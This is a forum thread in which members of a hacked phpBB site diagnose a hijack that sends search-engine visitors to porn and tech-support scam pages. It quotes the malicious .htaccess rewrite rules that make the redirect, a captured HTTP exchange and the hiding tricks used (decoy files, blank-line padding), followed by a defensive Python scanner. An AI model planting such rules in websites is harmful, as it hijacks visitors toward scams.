
Google Searches Hijacked

Posted: Sat Jun 18, 2016 10:17 pm
by ManagedMan
Looks like the hijackers are at it again.

When I do a Google search for "Chastity Forums" the two top link results appear to be to www.chastityforums.com, but when clicked take the browser to a variety of porn sites.

Re: Google Searches Hijacked

Posted: Tue Jun 21, 2016 1:00 pm
by Minas_Bitch
I get this when I am just browsing the site sometimes as well. Has the site been hacked?

Re: Google Searches Hijacked

Posted: Wed Jun 22, 2016 12:12 pm
by TwistedMister
An announcement has been in the "Announcements" section since April. See there? At the top of the forum board/thread lists? Where it says "Announcements"?

:facepalm:

Yes, there is an issue, but we seem to be low on the list of getting things fixed.

As a work-around, instead of left-clicking on the search links, right-click and copy the address, and paste it into the browser address bar. That will get you there correctly.

Re: Google Searches Hijacked

Posted: Thu Jun 23, 2016 8:50 am
by beheld
I doubt this will be fixed anytime soon. Multiple people have offered to help, but the admin seem to be fine with it because they have a workaround they use. If you want to use the site, install a plugin like "referer control" and block the HTTP referer for the site. No need for right clicking or anything.

I'm not sure why the admins haven't fixed the issue. I know I've seen several comments from folks that sound competent enough to fix the problem. It should be just a matter of finding the hacked code and removing it. Downloading the code from the server and comparing it to the stock phpBB code would probably find the problem. Could be something that's been added to the .htaccess file. It could be something injected into the database but that's more unlikely.

Re: Google Searches Hijacked

Posted: Sun Jul 31, 2016 7:31 am
by TwistedMister
woodenturner wrote:... Could be something that's been added to the .htaccess file...
After a bunch of looking and testing, I believe you hit the nail on the head with the .htaccess file.

----------------------------------------------------------------------------------------
A GET request is sent to 104.131.131.106:80

{request header}
Host: top-24h-can-store.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: -http://top-24h-can-store.com/redirect.php?z=viagra
Connection: keep-alive
The remote host sets a 302 status (temporary redirect)

{response header}
Connection: Keep-Alive
Content-Length: 0
Content-Type: text/html
Date: Sat, 30 Jul 2016 12:01:41 GMT
Keep-Alive: timeout=5, max=100
Location: -http://1empiredirect.com/redirect?aff_i ... uid%3D2382
Server: Apache/2.4.7 (Ubuntu)
Set-Cookie: visited=1; expires=Thu, 04-Aug-2016 12:01:41 GMT; Max-Age=432000
X-Powered-By: PHP/5.5.9-1ubuntu4.3
And this is where everybody gets sent off to the porn and dating sites, and, eventually, if they try to back out instead of just closing the browser or right-clicking the 'back' button to get back to a point *before* the redirect, gets the fake computer virus warning with the scam 'tech support' phone number.

Tom, you need to FTP into the server and download the .htaccess file; it should be in the root directory and may be 'hidden'. The .htaccess file is an Apache system file; you may need to select something like "show hidden files" when you open your file manager. Once you locate the file, check the content for code that looks like this:
RewriteEngine On
RewriteCond %{ENV:REDIRECT_STATUS} 200
RewriteRule ^ - [L]
RewriteCond %{HTTP_USER_AGENT} (google|yahoo|msn|aol|bing) [OR]
RewriteCond %{HTTP_REFERER} (google|yahoo|msn|aol|bing)
RewriteRule ^(.*)$ excrescent-interfacer.php?$1 [L]

and

RewriteEngine On
RewriteCond %{HTTP_REFERER} (google|aol|yahoo|msn|search|bing|Seznam|seznam)
RewriteRule . http: // top-24h-can-store . com /redirect.php?z=viagra [L]
There may be a "decoy" file, htaccess or .taccess to confuse the real file, and when you check the contents be sure you are scrolling all the way to the end of the file as hackers may add 100s of blank lines before any malicious directives.

You will need to clean up the .htaccess file and remove any "rogue" php files (if any, but I don't think there are, I think they keep the scripts on the other servers) to clean up the hack.

All you should have to do is delete that code as above, and the blank lines, save the file and then upload it back to the server---> make sure to *overwrite* the old .htaccess with the new one you just edited.

Once you've done this, the problem *should* be solved...except you'll need to change the login and password, it is obviously compromised.
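
A small scanner for the pattern described in the post above, added here as an example and not part of the original thread: it flags any RewriteRule gated on a search-engine Referer or User-Agent, and any directive that follows a long run of blank lines. The 20-line threshold, the sample file and the redirector.example host are constructed for illustration.

```python
import re

# Search-engine names like those in the conditions quoted in the post above.
ENGINES = re.compile(r"google|yahoo|bing|msn|aol|seznam", re.I)
COND = re.compile(r"^\s*RewriteCond\s+%\{(HTTP_REFERER|HTTP_USER_AGENT)\}\s+(\S+)", re.I)
RULE = re.compile(r"^\s*RewriteRule\s+\S+\s+(\S+)", re.I)
BLANK_RUN = 20  # assumed threshold for suspicious blank-line padding


def scan_htaccess(text):
    """Return (line_number, message) findings for the text of one .htaccess file."""
    findings, pending, blanks = [], None, 0
    for no, line in enumerate(text.splitlines(), 1):
        if not line.strip():
            blanks += 1
            continue
        if blanks >= BLANK_RUN:
            findings.append((no, f"directive follows {blanks} blank lines"))
        blanks = 0
        m = COND.match(line)
        if m and ENGINES.search(m.group(2)):
            # Remember the first search-engine condition until its RewriteRule arrives.
            pending = pending or (no, m.group(1).upper())
            continue
        m = RULE.match(line)
        if m:
            if pending and m.group(1) != "-":
                findings.append((no, f"rewrite to {m.group(1)} only for search-engine "
                                     f"{pending[1]} (condition on line {pending[0]})"))
            pending = None
        elif not line.lstrip().lower().startswith("rewritecond"):
            pending = None
    return findings


# Constructed sample: a normal front-controller rule, padding, then a referer-gated rule.
SAMPLE = (
    "RewriteEngine On\n"
    "RewriteCond %{REQUEST_FILENAME} !-f\n"
    "RewriteRule ^(.*)$ app.php [QSA,L]\n"
    + "\n" * 40
    + "RewriteEngine On\n"
    "RewriteCond %{HTTP_REFERER} (google|yahoo|bing)\n"
    "RewriteRule . http://redirector.example/r.php [L]\n"
)

if __name__ == "__main__":
    for no, msg in scan_htaccess(SAMPLE):
        print(f"line {no}: {msg}")
```

Because it takes file text rather than a fixed path, it can be run over every htaccess-like file pulled from the server, decoys included.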